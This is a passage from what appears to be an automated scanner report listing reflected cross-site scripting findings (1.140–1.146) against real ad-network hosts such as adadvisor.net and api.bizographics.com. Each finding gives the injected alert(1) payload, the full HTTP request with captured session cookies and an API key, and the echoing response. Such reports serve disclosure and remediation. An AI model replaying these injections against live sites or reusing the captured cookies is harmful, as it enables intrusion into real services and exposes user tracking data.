b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:30:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 28 Jun 2011 01:30:08 GMT
Pragma: no-cache
Content-Length: 4682
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?329c7"-alert(1)-"2dd5a4072bd=1&Z=300x250&s=1887835&_salt=2827879769";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.140. http://adadvisor.net/adscores/g.js [_cx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The value of the _cx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66f26"-alert(1)-"d2f5504bbaf was submitted in the _cx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscores/g.js?sid=9263342628&_ri=1309228166&_cx=00166f26"-alert(1)-"d2f5504bbaf HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:29:27 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 458
Content-Type: application/javascript

document.write( "<scr" + "ipt type='text/javascript'>var mm_context_flag = '00166f26"-alert(1)-"d2f5504bbaf';var mm_ri2 = '1309228166';var targ_score = '000';var targ_zip = '';var targ_indiv1_age = '';var targ_indiv1_gender = '';var targ_indiv1_timestamp = '';var targ_indiv2_age = '';var targ_indiv2_gender
...[SNIP]...

1.141. http://adadvisor.net/adscores/g.js [_ri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The value of the _ri request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a193"-alert(1)-"3c08002ac4e was submitted in the _ri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscores/g.js?sid=9263342628&_ri=13092281668a193"-alert(1)-"3c08002ac4e&_cx=001 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:29:27 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 458
Content-Type: application/javascript

document.write( "<scr" + "ipt type='text/javascript'>var mm_context_flag = '001';var mm_ri2 = '13092281668a193"-alert(1)-"3c08002ac4e';var targ_score = '000';var targ_zip = '';var targ_indiv1_age = '';var targ_indiv1_gender = '';var targ_indiv1_timestamp = '';var targ_indiv2_age = '';var targ_indiv2_gender = '';var targ_indiv2_times
...[SNIP]...

1.142. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 22c2c<script>alert(1)</script>b704870b2c0 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback22c2c<script>alert(1)</script>b704870b2c0&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=nfKE0o2gVAWW2gKtc9p719Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe32hAXyKQv5slExkNK7HUtFp4B4dlWpgdiiii7oa2yMBisxT8l3ZY0x5384cO8CXT3w9WGnfYj6EmHipAu1mGwE1mTRK5B29oiiex3ln3hiiYfpCN1xpl7n8isOcF9isuZCR3CvquVTGOVyTMzMOTpepJUdgwuhwxSOTisbiiey1NPJYa17G7HbipadhJoeOBujFAjpj8yhiptFALUYSbU9MSWJyvpiiNuqjH89PaO82isMBbrP3JUYHwJgHescjFAyxuBiswipz7gIrGD16MVPGT8txMaODe9cOOkiim9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqmtUGVbyBQ98YAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 28 Jun 2011 01:23:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe09Tbfgl0wRNlExkNK7HUtFp4B4dlWpgdjiiPoipQyLW7eT8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 550
Connection: keep-alive

cnnad_bizo_load_ad_callback22c2c<script>alert(1)</script>b704870b2c0({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

1.143. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload c806c<script>alert(1)</script>2d1ff097795 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?callback=load_ad_callback&api_key=18d8c7d8c4d04d1588a9cf479a85164ec806c<script>alert(1)</script>2d1ff097795 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=nfKE0o2gVAWW2gKtc9p719Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe32hAXyKQv5slExkNK7HUtFp4B4dlWpgdiiii7oa2yMBisxT8l3ZY0x5384cO8CXT3w9WGnfYj6EmHipAu1mGwE1mTRK5B29oiiex3ln3hiiYfpCN1xpl7n8isOcF9isuZCR3CvquVTGOVyTMzMOTpepJUdgwuhwxSOTisbiiey1NPJYa17G7HbipadhJoeOBujFAjpj8yhiptFALUYSbU9MSWJyvpiiNuqjH89PaO82isMBbrP3JUYHwJgHescjFAyxuBiswipz7gIrGD16MVPGT8txMaODe9cOOkiim9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqmtUGVbyBQ98YAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 01:23:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (18d8c7d8c4d04d1588a9cf479a85164ec806c<script>alert(1)</script>2d1ff097795)

1.144. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload c5987<script>alert(1)</script>2cab3bed7fe was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27c5987<script>alert(1)</script>2cab3bed7fe HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=W07VoyD3FI1GbxCaThVT9dQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1Tv19kKqtnc1ExkNK7HUtFp4B4dlWpgdjpxKsxrF0FOT8l3ZY0x538Edl9088opniiy7Tisiiv8ud73bPybipsI72KFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8dFbBPEFRIVFMZ218XXIxQyHOMii9UugGGPk0NMevbCvWSKoPv3akGJn9agv745Qr5IJ3gbov8KEJYDkHXpraf10qTGM4iizfBerkA0GIniiiiNUhqNMyxYbuMj3ZDQLwAm7cXIvMbZurNBiptnisc2w3xiiwjQ5J1NiioiiuVyWVygGvQ3S4Hiix0shFQqntVRchwMZxV9EN5rntW8Fc6nOGSnuTLaGvz2ftQf0jm4qRUiiDAUvGuhjsX7jk5v8KoEvisFD4UEZKbR1K16oRVxEEzFKYiiOOmfUvNgUnOhTVe; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 03:01:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a27c5987<script>alert(1)</script>2cab3bed7fe)

1.145. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 2c31f<script>alert(1)</script>19f2a3b4867 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=2c31f<script>alert(1)</script>19f2a3b4867&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=W07VoyD3FI1GbxCaThVT9dQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1Tv19kKqtnc1ExkNK7HUtFp4B4dlWpgdjpxKsxrF0FOT8l3ZY0x538Edl9088opniiy7Tisiiv8ud73bPybipsI72KFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8dFbBPEFRIVFMZ218XXIxQyHOMii9UugGGPk0NMevbCvWSKoPv3akGJn9agv745Qr5IJ3gbov8KEJYDkHXpraf10qTGM4iizfBerkA0GIniiiiNUhqNMyxYbuMj3ZDQLwAm7cXIvMbZurNBiptnisc2w3xiiwjQ5J1NiioiiuVyWVygGvQ3S4Hiix0shFQqntVRchwMZxV9EN5rntW8Fc6nOGSnuTLaGvz2ftQf0jm4qRUiiDAUvGuhjsX7jk5v8KoEvisFD4UEZKbR1K16oRVxEEzFKYiiOOmfUvNgUnOhTVe; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 03:01:14 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2c31f<script>alert(1)</script>19f2a3b4867

1.146. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

